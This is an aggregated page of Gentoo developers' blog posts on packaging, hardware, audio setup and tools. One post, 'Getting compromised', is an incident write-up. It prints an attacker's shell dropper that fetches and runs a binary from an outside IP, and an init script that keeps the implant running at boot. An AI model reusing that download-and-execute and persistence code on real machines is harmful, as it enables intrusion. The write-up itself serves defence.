Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
January 25, 2015, 16:04 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on ?!

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.36.4-znodelete.patch,
  -files/glib-2.37.x-external-gdbus-codegen.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
dconf ebuild is fixed to not set default useflags. So only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus useflag, which is default-enabled on desktop profiles, so there the dependency chain works as desired. And for the no-desktop no-X usecase we have no extra dependencies, and no reason to be grumpy.

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as dependency). But on not-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too old software and Portage which can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say in 6-months blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it in a while anymore, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird because you could do that before and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there's some obvious bugs - the black background glows purple, there's random output from init scripts bleeding over the bootsplash. And then once you login there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI and goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT TEH EFF!

The UI is ... MovieOS got drunk. A part is kinda touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram only, some part are text only - and since this is a chinese edition I wouldn't even know hot to reboot it! squiggly hat box squiggly bug ... or is it square squiggly star ? Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like the hibernate and shutdown bugs are crosswired the wrong way?
There's random slowdowns doing basic tasks, even youtube video randomly stutters and glitches because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring, with full KDE running the memory usage is near 500MB (compared to >2GB for the win demo). Video runs smoothly, audio works. Ethernet connection with r8169 works, WLAN with BCM43142 requires broadcom-sta aka. wl. Very very bad driver stupid, it'd be easier to not have this device built in.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode, the E431 quietly fails (sigh) because SecureBoot (sigh!) unless you actively disable it. Also randomly the E431 tries to reset to factory defaults, or fails to boot with Fan Warning. Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with maximum amount of RAM, but on the upside the minimum is defined by Win8 Demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly installed and preconfigured. And, maybe, a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I have no opinion if it works because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://432.567.99.1/install/8005
chmod +x 8005
./8005


At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
#!/bin/sh
# chkconfig: 12345 90 90
# description: epnlmqmjph
### BEGIN INIT INFO
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
### END INIT INFO
case $1 in
start)
        /usr/bin/epnlmqmjph
        ;;
stop)
        ;;
*)
        /usr/bin/epnlmqmjph
        ;;
esac
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* a file in /sbin I think - I didn't write down everything, just archived it for later analysis
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after reboot I saw a connection with putty as user agent in the ssh logs.
Sorry kid, not today ;)

There's a strong lesson in this: Do not use ssh passwords. Especially for root. A weak password can be accidentally bruteforced in a day or two!

sshd has an awesome feature: "PermitRootLogin without-password" if you rely on root login, at least avoid sucessful password logins!

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgrade all cinnamon ebuilds to 2.4 in tree. However I could not get Cinnamon (shell part) to actually work, as in show anything useful on my display. So this is a public service announcement that if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell does not seem to work with cinnamon’s shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to setup. Likely PulseAudio on both machines, few setup bits and done. If you are looking for a guide on how to do such a thing in Windows, you’re likely end up setting up an icecast server listening to the stereo mix. Bad twice. Firstly, stereo-only. Secondly, poor latency. Now imagine playing a game or watching a movie with sound noticeably delayed after picture (well, in the movie player you could at least play with A/V delay to work-around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, with the only difference in used audio driver.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too. Best fit it with the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4

At this point, slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.

Setting up the virtual device

After getting the slave up, it’s time to set the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is insalled (no need to reboot), the system should start seeing two new devices — playback device called ‘Hi-Fi Cable Input’ and recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

Control Panel sound settings with virtual Hi-Fi Cable Input deviceAdvanced Hi-Fi Cable Input device properties (sample rate and bit depth setting)

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work-around soon…

Setting up the JACK master

Now that device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ both as input and output device. The right-arrow button right of the text inputs should provide a list of devices to select. Additionally select the sample rate matching the one set for the virtual device and the JACk slave.

JACK setup window

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option from the ‘Options’ (right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select is as post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that the JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be through connecting the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports using ASIO-compatible sound processors. In other words, the sound from virtual cable input is directed into ASIO output port for processing. Good news is that the stereo stripping occurs directly in virtual cable output, so ASIO still gets all the channels. All we have to do is to capture sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

ASIO Bridge window

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on left-hand side to add an output socket, select ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then, ‘Add’ on right-hand side, your remote host as client and add all the output channels. Now select both new sockets and ‘Connect’.

JACK patchbay setup

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

JACK connections window after setup

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set an explicit connection between your virtual device and real system audio device. On my system that connection is established automatically, so that the sounds reach both remote host and local speakers. If that’s unrequested, just mute the sound card…

Secondly, note that now the virtual sound card is the default device, so applications will control its volume (both for remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite some very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.

http://www.sysresccd.org/
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses on how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing which I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7- but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.

Downsides? Well, not much. Even if you select a 64bit Kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.



From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)
Homepage: http://www.sysresccd.org/
Forums: http://www.sysresccd.org/forums/

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Fortune cookie wisdom part VI (January 14, 2015, 19:11 UTC)

It’s been a long time since I’ve posted a new set of “Fortune cookie wisdom,” but I think that I have five good ones here. Before reading them, if you’d like to check out the previous posts in the series, you can with the links below:

Now that you’ve wasted a good amount of time reading those previous posts (hey, it’s better than watching more cat videos on YouTube, right?), here are the new ones:

  • Generosity and perfection are your everlasting goals.
  • We must always have old memories and young hopes.
  • Discontent is the first step in the progress of a man or a nation.
